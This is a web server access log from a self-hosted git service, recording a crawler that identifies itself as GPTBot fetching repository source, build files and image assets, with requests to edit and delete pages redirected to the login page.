"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 764] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16202] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:07:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:07:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" +[17/Feb/2026:17:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 968] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" +[17/Feb/2026:17:07:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" +[17/Feb/2026:17:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/bearing.png" +[17/Feb/2026:17:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 9860] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:07:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:07:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:07:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" +[17/Feb/2026:17:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/reactor.png" +[17/Feb/2026:17:07:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" +[17/Feb/2026:17:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/favicon.ico" +[17/Feb/2026:17:07:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" +[17/Feb/2026:17:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/bearing.png" +[17/Feb/2026:17:07:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" +[17/Feb/2026:17:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/favicon.ico" +[17/Feb/2026:17:07:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" +[17/Feb/2026:17:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/reactor.png" +[17/Feb/2026:17:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 9852] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" +[17/Feb/2026:17:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 9852] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" +[17/Feb/2026:17:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 9840] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" +[17/Feb/2026:17:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" +[17/Feb/2026:17:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 954] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" +[17/Feb/2026:17:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 954] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" +[17/Feb/2026:17:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" +[17/Feb/2026:17:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 954] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" +[17/Feb/2026:17:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" +[17/Feb/2026:17:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 968] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 18685] [Gzip 6.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:07:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" +[17/Feb/2026:17:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/dcsintegration.png" +[17/Feb/2026:17:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14655] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14656] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11118] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11116] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14654] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14656] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11120] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14656] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11117] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:07:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:07:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11117] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11114] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:07:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14655] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11116] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14661] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 